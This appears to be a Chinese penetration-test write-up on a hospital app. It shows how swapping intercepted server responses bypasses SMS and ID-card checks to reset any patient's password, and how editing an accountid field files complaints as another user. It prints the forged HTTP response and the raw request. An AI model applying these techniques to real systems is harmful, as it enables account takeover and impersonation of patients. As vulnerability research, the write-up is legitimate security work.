记某医院APP的一次逻辑漏洞挖掘

admin

139935
文章

114
评论

2025年5月5日19:36:28评论1 views字数 2185阅读7分17秒阅读模式

扫码加内部知识圈

获取漏洞资料

在某次渗透测试中，对某医院的APP进行抓包测试，主要挖掘了一些逻辑漏洞，记录如下：

抓包APP请求的网站地址，复制到网页中打开

通过“找回密码”时由于只会验证返回包内容，可以抓包将返回包替换，成功重置了任意用户的密码，这会对系统正常用户的业务处理造成影响

访问风险地址，输入重置的密码，手机号、证件号，然后首先是短信验证

正确的返回包应该如下：

修改mobile为系统中存在的手机号（通过信息手机获得的已经注册的病人手机号），抓取返回包替换成下面的数据包，绕过前端验证成功进入下一步验证身份证

HTTP/1.1 200 OKServer: Apache-Coyote/1.1Access-Control-Allow-Origin: http://xxxxAccess-Control-Allow-Headers: Origin, x-requested-with, Content-Type, Accept,X-CookieAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: GET,POST,PUT,OPTIONS,DELETEContent-Type: application/json;charset=UTF-8Date: Sat, 22 Jan 2022 13:01:24 GMTConnection: closeContent-Length: 125{"msg":"验证码正确","code":1,"data":{"mobile":"xxxx","sign":"1ab261dcb1d4993abf7700e2bdbf583f","hascard":"true"}}

身份证正确的返回包应该如下，同理抓取其他地方的成功返回包直接替换

绕过前端对证件号的验证判断，进入最后一步修改个人信息。发包，最后返回信息修改成功。此时对应手机号的密码被成功重置

测试在APP和网页端都能使用重置的密码成功登陆，重置对应手机账号的密码为Aa123456

此外在APP的投诉举报处，通过修改accountid，可以以他人的账号身份进行投诉举报。

通过注册登录APP，对投诉举报的提交进行抓包

数据包如下：

POST /api/authex/hpass/cloudClinic/saveComplain?t=1 HTTP/1.1Host: xxxxContent-Length: 187Pragma: no-cacheCache-Control: no-cacheAccept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; MuMu Build/V417IR; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Mobile Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,en-US;q=0.9Connection: close{"accountid":"149773","demandTypeCode":"1","complaintedPsnName":"1","issueOccurDatetime":"2022-01-22 01:04","complaintTypeCode":"0","complaintTitle":"1","complaintText":"1","address":"1"}